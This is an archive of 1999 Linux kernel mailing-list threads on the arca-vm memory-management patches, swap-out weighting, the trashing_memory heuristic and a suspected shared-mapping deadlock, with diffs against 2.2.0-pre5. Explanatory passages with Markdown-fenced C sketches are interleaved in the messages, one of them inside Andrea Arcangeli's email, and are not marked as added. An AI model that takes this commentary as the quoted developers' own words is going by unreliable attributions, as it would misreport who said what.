@ 1999-01-06 23:31 58%                                   ` Andrea Arcangeli
  1999-01-06 23:35 64%                                   ` Linus Torvalds
  1 sibling, 0 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-06 23:31 UTC (permalink / raw)
  To: steve, brent verner, Garst R. Reese, Kalle Andersson,
	Zlatko Calusic, Ben McCann
  Cc: bredelin, linux-kernel, linux-mm, Linus Torvalds, Alan Cox,
	Stephen C. Tweedie

On Wed, 6 Jan 1999, Andrea Arcangeli wrote:

> I've put out arca-vm-9.

Whoops, in both arca-vm-8 and arca-vm-9 there was a very stupid bug in my
changes to the memory_trashing heuristic (done at too late an hour...).
Basically, once a process was marked as a memory_trasher, it had no way
to go back to being unmarked.
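
One plausible reading of this bug, based on the arca-vm-8 page_alloc.c
hunk earlier in this thread: the freepages.low test ran before the
freepages.high test, and since high sits above low the branch that clears
trashing_memory could never be reached. The following is a minimal
user-space sketch of that reading, not the kernel code. The struct and
function names are hypothetical, the PF_MEMALLOC test is left out, and the
"fixed" ordering is taken from the later patch against 2.2.0-pre5 in this
thread rather than from arca-vm-10 itself.

```c
#include <stdbool.h>

/* Hypothetical stand-in for the kernel's freepages watermarks. */
struct watermarks {
	int min, low, high;
};

/*
 * Ordering as in the arca-vm-8 hunk: "low" is tested before "high".
 * Returns true if the allocation may proceed without freeing memory first.
 */
static bool may_allocate_vm8(int nr_free, int order, struct watermarks w,
			     bool *trashing)
{
	int need = 1 << order;

	if (nr_free > w.min + need) {
		if (!*trashing)
			return true;
		if (nr_free > w.low + need)
			return true;	/* also taken when nr_free > high */
		if (nr_free > w.high + need) {
			/* unreachable as long as high >= low */
			*trashing = false;
			return true;
		}
	}
	*trashing = true;
	return false;
}

/* Ordering as in the later 2.2.0-pre5 based patch: "high" is tested first. */
static bool may_allocate_fixed(int nr_free, int order, struct watermarks w,
			       bool *trashing)
{
	int need = 1 << order;

	if (nr_free > w.min + need) {
		if (!*trashing)
			return true;
		if (nr_free > w.high + need) {
			*trashing = false;	/* plenty of memory: unmark */
			return true;
		} else if (nr_free > w.low + need) {
			return true;
		}
	}
	*trashing = true;
	return false;
}
```

With plenty of free memory, the first variant lets the allocation through
but leaves the flag set, while the second one clears it.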

I didn't notice the bug because I use swap only when I run my benchmarks
(when there is no swapping in progress the slowdown due to some
shrink_mmap() can't be seen by eye...) and when I run my benchmarks I
always start before the memory trasher proggy...

Thanks to Benjamin who showed me the bugs some seconds ago ;)

I've put out a new arca-vm-10 with at least this bug fixed.

ftp://e-mind.com/pub/linux/kernel-patches/2.2.0-pre4-arca-VM-10

Excuse me...

BTW, I have reports that arca-vm-6/7 are faster than arca-vm-8/9
(arca-vm-7 is reported as the fastest, even faster than arca-vm-3). Maybe
this bug is why the latest ones are slower, or maybe all the new
changes to the first memory_trashing code (the one in 2.2.0-pre4) are
hurting... (even if here they seem to help: with them the trashing
process remains marked all the time and not only during low-memory peaks,
and non-trashing processes never get marked as trashing)

And again thanks to Steve, Zlatko, Benjamin, Ben, Garst, MikeG, Kalle,
Brent and all other testers for their good reports! 

Andrea Arcangeli


^ permalink raw reply	[relevance 58%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-06 14:48 63%                                 ` Andrea Arcangeli
  1999-01-06 23:31 58%                                   ` Andrea Arcangeli
@ 1999-01-06 23:35 64%                                   ` Linus Torvalds
  1999-01-07  4:30 62%                                     ` Eric W. Biederman
  1999-01-07 14:11 45%                                     ` Andrea Arcangeli
  1 sibling, 2 replies; 200+ results
From: Linus Torvalds @ 1999-01-06 23:35 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: steve, brent verner, Garst R. Reese, Kalle Andersson,
	Zlatko Calusic, Ben McCann, Alan Cox, bredelin,
	Stephen C. Tweedie, linux-kernel, Rik van Riel, linux-mm


Oh, well.. Based on what the arca-[678] patches did, there's now a pre-5
out there. Not very similar, but it should incorporate the basic idea: 
namely much more aggressively asynchronous swap-outs from a process
context. 

Comment away,

		Linus


^ permalink raw reply	[relevance 64%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-06 23:35 64%                                   ` Linus Torvalds
@ 1999-01-07  4:30 62%                                     ` Eric W. Biederman
  1999-01-07 17:56 48%                                       ` Linus Torvalds
  1999-01-07 14:11 45%                                     ` Andrea Arcangeli
  1 sibling, 1 reply; 200+ results
From: Eric W. Biederman @ 1999-01-07  4:30 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Andrea Arcangeli, steve, brent verner, Garst R. Reese,
	Kalle Andersson, Zlatko Calusic, Ben McCann, Alan Cox, bredelin,
	Stephen C. Tweedie, linux-kernel, Rik van Riel, linux-mm

>>>>> "LT" == Linus Torvalds <torvalds@transmeta.com> writes:

LT> Oh, well.. Based on what the arca-[678] patches did, there's now a pre-5
LT> out there. Not very similar, but it should incorporate the basic idea: 
LT> namely much more aggressively asynchronous swap-outs from a process
LT> context. 

LT> Comment away,

1) With your comments on PG_dirty/(what shrink_mmap should do) you
   have worked out what needs to happen for the mapped in memory case,
   and I haven't quite gotten there.  Thank You.

2) I have tested using PG_dirty from shrink_mmap and it is a
   performance problem because it loses all locality of reference,
   and because it forces shrink_mmap into a dual role, of freeing and
   writing pages, which need separate tuning.

Linus is this a case you feel is important to tune for 2.2?
If so I would be happy to play with it.

Eric

^ permalink raw reply	[relevance 62%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-06 23:35 64%                                   ` Linus Torvalds
  1999-01-07  4:30 62%                                     ` Eric W. Biederman
@ 1999-01-07 14:11 45%                                     ` Andrea Arcangeli
  1999-01-07 18:19 55%                                       ` Linus Torvalds
  1 sibling, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-07 14:11 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: steve, brent verner, Garst R. Reese, Kalle Andersson,
	Zlatko Calusic, Ben McCann, bredelin, linux-kernel, linux-mm

On Wed, 6 Jan 1999, Linus Torvalds wrote:

> Oh, well.. Based on what the arca-[678] patches did, there's now a pre-5
> out there. Not very similar, but it should incorporate the basic idea: 
> namely much more aggressively asynchronous swap-outs from a process
> context. 

I like it, in fact ;). I just have some diffs that I would like to put under
testing. The patches are against 2.2.0-pre5.

This first patch allows swap_out to have a more fine-grained weight. It should
help at least in low-memory environments.

diff -u linux/mm/vmscan.c:1.1.1.10 linux/mm/vmscan.c:1.1.1.1.2.72
--- linux/mm/vmscan.c:1.1.1.10	Thu Jan  7 12:21:36 1999
+++ linux/mm/vmscan.c	Thu Jan  7 14:46:17 1999
@@ -171,7 +179,7 @@
  */
 
 static inline int swap_out_pmd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pte_t * pte;
 	unsigned long pmd_end;
@@ -192,18 +200,20 @@
 
 	do {
 		int result;
-		tsk->swap_address = address + PAGE_SIZE;
 		result = try_to_swap_out(tsk, vma, address, pte, gfp_mask);
+		address += PAGE_SIZE;
+		tsk->swap_address = address;
 		if (result)
 			return result;
-		address += PAGE_SIZE;
+		if (!--*counter)
+			return 0;
 		pte++;
 	} while (address < end);
 	return 0;
 }
 
 static inline int swap_out_pgd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pmd_t * pmd;
 	unsigned long pgd_end;
@@ -223,9 +233,11 @@
 		end = pgd_end;
 	
 	do {
-		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask);
+		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PMD_SIZE) & PMD_MASK;
 		pmd++;
 	} while (address < end);
@@ -233,7 +245,7 @@
 }
 
 static int swap_out_vma(struct task_struct * tsk, struct vm_area_struct * vma,
-	unsigned long address, int gfp_mask)
+	unsigned long address, int gfp_mask, unsigned long * counter)
 {
 	pgd_t *pgdir;
 	unsigned long end;
@@ -247,16 +259,19 @@
 
 	end = vma->vm_end;
 	while (address < end) {
-		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask);
+		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PGDIR_SIZE) & PGDIR_MASK;
 		pgdir++;
 	}
 	return 0;
 }
 
-static int swap_out_process(struct task_struct * p, int gfp_mask)
+static int swap_out_process(struct task_struct * p, int gfp_mask,
+			    unsigned long * counter)
 {
 	unsigned long address;
 	struct vm_area_struct* vma;
@@ -275,9 +290,12 @@
 			address = vma->vm_start;
 
 		for (;;) {
-			int result = swap_out_vma(p, vma, address, gfp_mask);
+			int result = swap_out_vma(p, vma, address, gfp_mask,
+						  counter);
 			if (result)
 				return result;
+			if (!*counter)
+				return 0;
 			vma = vma->vm_next;
 			if (!vma)
 				break;
@@ -291,6 +309,25 @@
 	return 0;
 }
 
+static inline unsigned long calc_swapout_weight(int priority)
+{
+	struct task_struct * p;
+	unsigned long total_vm = 0;
+
+	read_lock(&tasklist_lock);
+	for_each_task(p)
+	{
+		if (!p->swappable)
+			continue;
+		if (p->mm->rss == 0)
+			continue;
+		total_vm += p->mm->total_vm;
+	}
+	read_unlock(&tasklist_lock);
+
+	return total_vm / (1+priority);
+}
+
 /*
  * Select the task with maximal swap_cnt and try to swap out a page.
  * N.B. This function returns only 0 or 1.  Return values != 1 from
@@ -299,7 +336,10 @@
 static int swap_out(unsigned int priority, int gfp_mask)
 {
 	struct task_struct * p, * pbest;
-	int counter, assign, max_cnt;
+	int assign;
+	unsigned long counter, max_cnt;
+
+	counter = calc_swapout_weight(priority);
 
 	/* 
 	 * We make one or two passes through the task list, indexed by 
@@ -315,23 +355,17 @@
 	 * Think of swap_cnt as a "shadow rss" - it tells us which process
 	 * we want to page out (always try largest first).
 	 */
-	counter = nr_tasks / (priority+1);
-	if (counter < 1)
-		counter = 1;
-	if (counter > nr_tasks)
-		counter = nr_tasks;
-
-	for (; counter >= 0; counter--) {
+	while (counter != 0) {
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
 	select:
 		read_lock(&tasklist_lock);
-		p = init_task.next_task;
-		for (; p != &init_task; p = p->next_task) {
+		for_each_task(p)
+		{
 			if (!p->swappable)
 				continue;
-	 		if (p->mm->rss <= 0)
+	 		if (p->mm->rss == 0)
 				continue;
 			/* Refresh swap_cnt? */
 			if (assign)
@@ -350,7 +384,7 @@
 			goto out;
 		}
 
-		if (swap_out_process(pbest, gfp_mask))
+		if (swap_out_process(pbest, gfp_mask, &counter))
 			return 1;
 	}
 out:
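
To make the new weight concrete, here is a rough user-space model of what
calc_swapout_weight() in the patch above computes. The task_model struct
is a hypothetical reduction of task_struct to the three fields the patch
reads, and the locking (tasklist_lock) is omitted. The result is, roughly,
the number of page-table entries swap_out() is willing to examine before
giving up, since swap_out_pmd() decrements the counter once per entry.

```c
#include <stddef.h>

/* Hypothetical, simplified view of the task fields the patch reads. */
struct task_model {
	int swappable;		/* nonzero if the task may be swapped */
	unsigned long rss;	/* resident pages */
	unsigned long total_vm;	/* mapped pages */
};

/*
 * Sum total_vm over swappable tasks with a nonzero RSS, then scale by
 * the priority: a lower priority value yields a larger scan budget.
 */
static unsigned long swapout_weight(const struct task_model *tasks,
				    size_t n, int priority)
{
	unsigned long total_vm = 0;

	for (size_t i = 0; i < n; i++) {
		if (!tasks[i].swappable)
			continue;
		if (tasks[i].rss == 0)
			continue;
		total_vm += tasks[i].total_vm;
	}
	return total_vm / (1 + (unsigned long)priority);
}
```

The budget therefore grows with the amount of mapped memory instead of
with nr_tasks, which is what the removed "counter = nr_tasks /
(priority+1)" code used.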







This other patch instead changes the trashing memory heuristic a bit, along
with how many pages are freed each time. I am not sure it's the best thing
to do. So if you try it, let me know the results...

Index: linux/mm/page_alloc.c
diff -u linux/mm/page_alloc.c:1.1.1.6 linux/mm/page_alloc.c:1.1.1.1.2.22
--- linux/mm/page_alloc.c:1.1.1.6	Thu Jan  7 12:21:35 1999
+++ linux/mm/page_alloc.c	Thu Jan  7 12:57:23 1999
@@ -3,6 +3,7 @@
  *
  *  Copyright (C) 1991, 1992, 1993, 1994  Linus Torvalds
  *  Swap reorganised 29.12.95, Stephen Tweedie
+ *  memory_trashing heuristic. Copyright (C) 1998  Andrea Arcangeli
  */
 
 #include <linux/config.h>
@@ -258,20 +259,18 @@
 		 * a bad memory situation, we're better off trying
 		 * to free things up until things are better.
 		 *
-		 * Normally we shouldn't ever have to do this, with
-		 * kswapd doing this in the background.
-		 *
 		 * Most notably, this puts most of the onus of
 		 * freeing up memory on the processes that _use_
 		 * the most memory, rather than on everybody.
 		 */
-		if (nr_free_pages > freepages.min) {
+		if (nr_free_pages > freepages.min+(1<<order)) {
 			if (!current->trashing_memory)
 				goto ok_to_allocate;
-			if (nr_free_pages > freepages.low) {
+			if (nr_free_pages > freepages.high+(1<<order)) {
 				current->trashing_memory = 0;
 				goto ok_to_allocate;
-			}
+			} else if (nr_free_pages > freepages.low+(1<<order))
+				goto ok_to_allocate;
 		}
 		/*
 		 * Low priority (user) allocations must not
@@ -282,7 +281,7 @@
 		{
 			int freed;
 			current->flags |= PF_MEMALLOC;
-			freed = try_to_free_pages(gfp_mask, SWAP_CLUSTER_MAX);
+			freed = try_to_free_pages(gfp_mask, freepages.high - nr_free_pages + (1<<order));
 			current->flags &= ~PF_MEMALLOC;
 			if (!freed && !(gfp_mask & (__GFP_MED | __GFP_HIGH)))
 				goto nopage;
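
For a sense of scale, the new count passed to try_to_free_pages() can be
worked through in user space. This sketch only reproduces the arithmetic
of the hunk above; the function name is hypothetical and the watermark
values in the note below are made up for illustration.

```c
/*
 * Number of pages the patched allocator asks try_to_free_pages() to
 * free: enough to climb back to the "high" watermark, plus the size of
 * the allocation being satisfied.
 */
static int pages_to_free(int freepages_high, int nr_free_pages, int order)
{
	return freepages_high - nr_free_pages + (1 << order);
}
```

With a high watermark of 256 pages, 100 pages free and an order-0
request, the allocator would ask for 157 pages in one go, where the
unpatched code always asks for SWAP_CLUSTER_MAX.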



Thanks.

Andrea Arcangeli


^ permalink raw reply	[relevance 45%]

* a bug report
@ 1999-01-07 15:53 64% radium
  1999-01-08 23:47 64% ` Anton Blanchard
  0 siblings, 1 reply; 200+ results
From: radium @ 1999-01-07 15:53 UTC (permalink / raw)
  To: ultralinux

[-- Attachment #1: Type: text/plain, Size: 250 bytes --]

I have a Sun SPARCstation 2 with 64 MB of RAM and a Seagate 4.5 HD. When I quit the X Window interface, the whole system crashes. I tried recompiling the kernel, but that doesn't fix the bug.

thank you for all your work
best regards,  Marc

[-- Attachment #2: Type: text/html, Size: 663 bytes --]

^ permalink raw reply	[relevance 64%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07  4:30 62%                                     ` Eric W. Biederman
@ 1999-01-07 17:56 48%                                       ` Linus Torvalds
  1999-01-07 18:18 61%                                         ` Rik van Riel
                                                           ` (5 more replies)
  0 siblings, 6 replies; 200+ results
From: Linus Torvalds @ 1999-01-07 17:56 UTC (permalink / raw)
  To: Eric W. Biederman
  Cc: Andrea Arcangeli, steve, brent verner, Garst R. Reese,
	Kalle Andersson, Zlatko Calusic, Ben McCann, Alan Cox, bredelin,
	Stephen C. Tweedie, linux-kernel, Rik van Riel, linux-mm



On 6 Jan 1999, Eric W. Biederman wrote:
> 
> 1) With your comments on PG_dirty/(what shrink_mmap should do) you
>    have worked out what needs to happen for the mapped in memory case,
>    and I haven't quite gotten there.  Thank You.

Note that it is not finalized. That's why I didn't write the code (which
should be fairly simple), because it has some fairly subtle issues and
thus becomes a 2.3.x thing, I very much suspect.

Basically, my rule of thumb for the changes I did was: "it should have the
same code paths as the old code". What that means is that I didn't
actually do any changes that changed real code: I did only changes that
changed _behaviour_.

That way I can be reasonably hopeful that there are no new bugs introduced
even though performance is very different. I _do_ have some early data
that seems to say that this _has_ uncovered a very old deadlock condition: 
something that could happen before but was almost impossible to trigger. 

The deadlock I suspect is:
 - we're low on memory
 - we allocate or look up a new block on the filesystem. This involves
   getting the ext2 superblock lock, and doing a "bread()" of the free
   block bitmap block.
 - this causes us to try to allocate a new buffer, and we are so low on
   memory that we go into try_to_free_pages() to find some more memory.
 - try_to_free_pages() finds a shared memory file to page out.
 - trying to page that out, it looks up the buffers on the filesystem it
   needs, but deadlocks on the superblock lock.
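
The suspected sequence above can be modelled in a few lines of user-space
C. This is only a sketch of the lock recursion, under the assumption that
the superblock lock is a plain non-recursive lock; all names are
hypothetical, and where the kernel would sleep forever the model simply
returns false.

```c
#include <stdbool.h>

/* Hypothetical model of a non-recursive lock such as the ext2 superblock lock. */
struct sb_lock {
	bool held;
};

/* Returns false where a real caller would have to sleep on the lock. */
static bool sb_trylock(struct sb_lock *l)
{
	if (l->held)
		return false;
	l->held = true;
	return true;
}

static void sb_unlock(struct sb_lock *l)
{
	l->held = false;
}

/* Paging out a shared-mapping page needs a block lookup, hence the lock. */
static bool page_out_shared(struct sb_lock *sb)
{
	if (!sb_trylock(sb))
		return false;	/* in the kernel: wait for ourselves, forever */
	sb_unlock(sb);
	return true;
}

/*
 * Block allocation: take the superblock lock, then read the bitmap block.
 * If memory is low, the buffer allocation falls into reclaim in the same
 * context, which may pick a shared mapping to page out.
 */
static bool alloc_block(struct sb_lock *sb, bool low_memory)
{
	bool ok = true;

	if (!sb_trylock(sb))
		return false;
	if (low_memory)
		ok = page_out_shared(sb);	/* bread() -> try_to_free_pages() */
	sb_unlock(sb);
	return ok;
}
```

In this model alloc_block() succeeds with enough memory and fails only
when reclaim re-enters the filesystem while the lock is already held.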

Note that this could happen before too (I've not removed any of the
codepaths that could lead to it), but it was dynamically _much_ less
likely to happen.

I'm not even sure it really exists, but I have some really old reports
that _could_ be due to this, and a few more recent ones (that I never
could explain). And I have a few _really_ recent ones from here internally
at transmeta that looks like it's triggering more easily these days.

(Note that this is not actually pre5-related: I've been chasing this on
and off for some time, and it seems to have just gotten easier to trigger,
which is why I finally have a theory on what is going on - just a theory
though, and I may be completely off the mark). 

The positive news is that if I'm right in my suspicions it can only happen
with shared writable mappings or shared memory segments. The bad news is
that the bug appears rather old, and no immediate solution presents
itself. 

> 2) I have tested using PG_dirty from shrink_mmap and it is a
>    performance problem because it loses all locality of reference,
>    and because it forces shrink_mmap into a dual role, of freeing and
>    writing pages, which need separate tuning.

Exactly. This is part of the complexity.

The right solution (I _think_) is to conceptually always mark it PG_dirty
in vmscan, and basically leave all the nasty cases to the filemap physical
page scan. But in the simple cases (ie a swap-cached page that is only
mapped by one process and doesn't have any other users), you'd start the
IO "early".

That would essentially mean that normal single mappings get the good
locality, while the case we really suck at right now (multiple mappings
which can all dirty the page) would not cause excessive page-outs. 
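
As a sketch of the policy described in the two paragraphs above, the
decision could look like the following. Nothing here is kernel code: the
page_model struct and its field names are hypothetical, and the real
thing would have to read this state from struct page and the swap cache.

```c
#include <stdbool.h>

/* Hypothetical summary of the page state the policy would look at. */
struct page_model {
	bool swap_cached;	/* page already has a swap cache entry */
	int mappers;		/* number of processes mapping the page */
	int other_users;	/* any further references to the page */
};

enum writeout {
	WRITE_EARLY,		/* start the IO from the virtual scan */
	DEFER_TO_PAGE_SCAN	/* just mark dirty, let the physical scan write */
};

/*
 * Simple case: a swap-cached page with one mapper and no other users is
 * written right away, which keeps the locality of the virtual scan.
 * Everything else is left to the physical page scan.
 */
static enum writeout vmscan_writeout(const struct page_model *pg)
{
	if (pg->swap_cached && pg->mappers == 1 && pg->other_users == 0)
		return WRITE_EARLY;
	return DEFER_TO_PAGE_SCAN;
}
```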

Basically, I think that the stuff we handle now with the swap-cache we do
well on already, and we'd only really want to handle the shared memory
case with PG_dirty. But I think this is a 2.3 issue, and I only added the
comment (and the PG_dirty define) for now. 

> Linus is this a case you feel is important to tune for 2.2?
> If so I would be happy to play with it.

It might be something good to test out, but I really don't want patches at
this date (unless your patches also fix the above deadlock problem, which
I can't see them doing ;)

		Linus


^ permalink raw reply	[relevance 48%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 17:56 48%                                       ` Linus Torvalds
@ 1999-01-07 18:18 61%                                         ` Rik van Riel
  1999-01-07 18:55 59%                                         ` Zlatko Calusic
                                                           ` (4 subsequent siblings)
  5 siblings, 0 replies; 200+ results
From: Rik van Riel @ 1999-01-07 18:18 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Eric W. Biederman, Andrea Arcangeli, steve, brent verner,
	Garst R. Reese, Kalle Andersson, Zlatko Calusic, Ben McCann,
	Alan Cox, bredelin, Stephen C. Tweedie, linux-kernel, linux-mm

On Thu, 7 Jan 1999, Linus Torvalds wrote:
> On 6 Jan 1999, Eric W. Biederman wrote:


> > 2) I have tested using PG_dirty from shrink_mmap and it is a
> >    performance problem because it loses all locality of reference,
> >    and because it forces shrink_mmap into a dual role, of freeing and
> >    writing pages, which need separate tuning.
> 
> Exactly. This is part of the complexity.

It can be solved by having a 'laundry' list like the *BSD
folks have and maybe a special worker thread to take care
of the laundry (optimizing placement on disk, etc).

> The right solution (I _think_) is to conceptually always mark it
> PG_dirty in vmscan, and basically leave all the nasty cases to the
> filemap physical page scan. But in the simple cases (ie a
> swap-cached page that is only mapped by one process and doesn't
> have any other users), you'd start the IO "early".
>
> That would essentially mean that normal single mappings get the good
> locality, while the case we really suck at right now (multiple mappings
> which can all dirty the page) would not cause excessive page-outs. 

We can already do that by simply not writing the page to
disk if there are other users besides us (keeping in mind
the swap cache and other system things).

One problem might be that we could end up with more on-disk
fragmentation that way (and maybe less clusterable I/O).

> Basically, I think that the stuff we handle now with the
> swap-cache we do well on already, and we'd only really want to
> handle the shared memory case with PG_dirty. But I think this is a
> 2.3 issue, and I only added the comment (and the PG_dirty define)
> for now.

It's quite definitely 2.3. It's just a minor performance
issue for most systems (an extra write is an order of
magnitude cheaper than an extra read where a process is
actually waiting).


Rik -- If a Microsoft product fails, who do you sue?
+-------------------------------------------------------------------+
| Linux memory management tour guide.        riel@humbolt.geo.uu.nl |
| Scouting Vries cubscout leader.    http://humbolt.geo.uu.nl/~riel |
+-------------------------------------------------------------------+


^ permalink raw reply	[relevance 61%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 14:11 45%                                     ` Andrea Arcangeli
@ 1999-01-07 18:19 55%                                       ` Linus Torvalds
  1999-01-07 20:35 64%                                         ` Andrea Arcangeli
  0 siblings, 1 reply; 200+ results
From: Linus Torvalds @ 1999-01-07 18:19 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: steve, brent verner, Garst R. Reese, Kalle Andersson,
	Zlatko Calusic, Ben McCann, bredelin, linux-kernel, linux-mm



On Thu, 7 Jan 1999, Andrea Arcangeli wrote:
> 
> This first patch allows swap_out to have a more fine-grained weight. It should
> help at least in low-memory environments.

The basic reason I didn't want to do this was that I thought it was wrong
to try to base _any_ decision on any virtual memory sizes. The reason is
simply that I think RSS isn't a very interesting thing to look at.

Yes, the current version also looks at RSS, but if you actually read the
code and think about what it does, it really only uses RSS as an
"ordering"  issue, and it doesn't actually matter for anything else -
we'll walk through all processes until they are all exhausted, and the
only thing that RSS does for us is to start off with the larger one.

Basically, it doesn't matter for anything but startup, because the steady
state will essentially just be a "go through each process in the list over
and over again", and the fact that the list has some ordering is pretty
much inconsequential. 

The real decision on what to throw out is done by the physical page scan,
that takes the PG_referenced bit into account.

So essentially, if we get anything wrong when we do the virtual page table
walk, the only thing that results in is that we might handle a few extra
page faults (but no extra IO, because the page faults will be satisfied
from the victim caches - the page cache and the swap cache). 

The only case this isn't true is the case where we have a shared file
mapping. That's where the PG_dirty issues come in - we've never done that
well from a performance standpoint, and pre-5 does not change that fact,
it just lays some foundations for doing it right in the future. 

So that's why I'd prefer to not complicate the VM counting any more. I
don't think it should make any fundamental difference (it might make a
difference in various extreme cases, but not, I think, under any kind of
realistic load).

But who knows, I've been wrong before. But now at least you know why I
didn't want it in the default kernel. 

> This other patch instead slightly changes the thrashing-memory heuristic and
> how many pages are freed each time. I am not sure it's the best thing to
> do, so if you try it, let me know the results...

I think this might well be tuned some, although I think your patch is
extreme. I'd love to hear comments from people who test it under different
loads and different memory sizes.

		Linus

^ permalink raw reply	[relevance 55%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 17:56 48%                                       ` Linus Torvalds
  1999-01-07 18:18 61%                                         ` Rik van Riel
@ 1999-01-07 18:55 59%                                         ` Zlatko Calusic
  1999-01-07 22:57 62%                                         ` Linus Torvalds
                                                           ` (3 subsequent siblings)
  5 siblings, 0 replies; 200+ results
From: Zlatko Calusic @ 1999-01-07 18:55 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Eric W. Biederman, Andrea Arcangeli, steve, brent verner,
	Garst R. Reese, Kalle Andersson, Ben McCann, Alan Cox, bredelin,
	Stephen C. Tweedie, linux-kernel, Rik van Riel, linux-mm

Linus Torvalds <torvalds@transmeta.com> writes:

[snip]
> 
> That way I can be reasonably hopeful that there are no new bugs introduced
> even though performance is very different. I _do_ have some early data
> that seems to say that this _has_ uncovered a very old deadlock condition: 
> something that could happen before but was almost impossible to trigger. 
> 
> The deadlock I suspect is:
>  - we're low on memory
>  - we allocate or look up a new block on the filesystem. This involves
>    getting the ext2 superblock lock, and doing a "bread()" of the free
>    block bitmap block.
>  - this causes us to try to allocate a new buffer, and we are so low on
>    memory that we go into try_to_free_pages() to find some more memory.
>  - try_to_free_pages() finds a shared memory file to page out.
>  - trying to page that out, it looks up the buffers on the filesystem it
>    needs, but deadlocks on the superblock lock.
> 
> Note that this could happen before too (I've not removed any of the
> codepaths that could lead to it), but it was dynamically _much_ less
> likely to happen.

You could very easily be right. Look below.

> 
> I'm not even sure it really exists, but I have some really old reports
> that _could_ be due to this, and a few more recent ones (that I never
> could explain). And I have a few _really_ recent ones from here internally
> at Transmeta that look like it's triggering more easily these days.
> 
> (Note that this is not actually pre5-related: I've been chasing this on
> and off for some time, and it seems to have just gotten easier to trigger,
> which is why I finally have a theory on what is going on - just a theory
> though, and I may be completely off the mark). 
> 
> The positive news is that if I'm right in my suspicions it can only happen
> with shared writable mappings or shared memory segments. The bad news is
> that the bug appears rather old, and no immediate solution presents
> itself. 

Exactly. I was torture-testing shared mappings when I got a very weird
deadlock. It happened only once, a few days ago. Look at the report and
enjoy:

Jan  5 03:49:14 atlas kernel: SysRq: Show Memory 
Jan  5 03:49:14 atlas kernel: Mem-info: 
Jan  5 03:49:14 atlas kernel: Free pages:         512kB 
Jan  5 03:49:14 atlas kernel:  ( Free: 128 (128 256 384) 
Jan  5 03:49:14 atlas kernel: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 4*128kB = 512kB) 
Jan  5 03:49:14 atlas kernel: Swap cache: add 131125/131125, delete 130652/130652, find 0/0
Jan  5 03:49:14 atlas kernel: Free swap:       231632kB 
Jan  5 03:49:14 atlas kernel: 16384 pages of RAM 
Jan  5 03:49:14 atlas kernel: 956 reserved pages 
Jan  5 03:49:14 atlas kernel: 17996 pages shared 
Jan  5 03:49:14 atlas kernel: 473 pages swap cached 
Jan  5 03:49:14 atlas kernel: 13 pages in page table cache 
Jan  5 03:49:14 atlas kernel: Buffer memory:    14696kB 
Jan  5 03:49:14 atlas kernel: Buffer heads:     14732 
Jan  5 03:49:14 atlas kernel: Buffer blocks:    14696 
Jan  5 03:49:14 atlas kernel:    CLEAN: 144 buffers, 18 used (last=122), 0 locked, 0 protected, 0 dirty

This looks exactly like the problem you were describing, doesn't it?

[snip]
> Basically, I think that the stuff we handle now with the swap-cache we do
> well on already, and we'd only really want to handle the shared memory
> case with PG_dirty. But I think this is a 2.3 issue, and I only added the
> comment (and the PG_dirty define) for now. 

Nice, thanks. That will make experimenting slightly easier and will
encourage people to actually experiment with a PG_dirty
implementation. So far, only Eric has done some work in this area.

Of course, this is all 2.3 work.

> 
> > Linus is this a case you feel is important to tune for 2.2?
> > If so I would be happy to play with it.
> 
> It might be something good to test out, but I really don't want patches at
> this date (unless your patches also fix the above deadlock problem, which
> I can't see them doing ;)
> 

Sure!
-- 
Zlatko

^ permalink raw reply	[relevance 59%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 17:56 48%                                       ` Linus Torvalds
  1999-01-07 18:18 61%                                         ` Rik van Riel
  1999-01-07 18:55 59%                                         ` Zlatko Calusic
@ 1999-01-07 22:57 62%                                         ` Linus Torvalds
  1999-01-08  1:16 60%                                           ` Linus Torvalds
  1999-01-08  2:56 54%                                         ` Eric W. Biederman
                                                           ` (2 subsequent siblings)
  5 siblings, 1 reply; 200+ results
From: Linus Torvalds @ 1999-01-07 22:57 UTC (permalink / raw)
  To: Eric W. Biederman
  Cc: Andrea Arcangeli, steve, brent verner, Garst R. Reese,
	Kalle Andersson, Zlatko Calusic, Ben McCann, Alan Cox, bredelin,
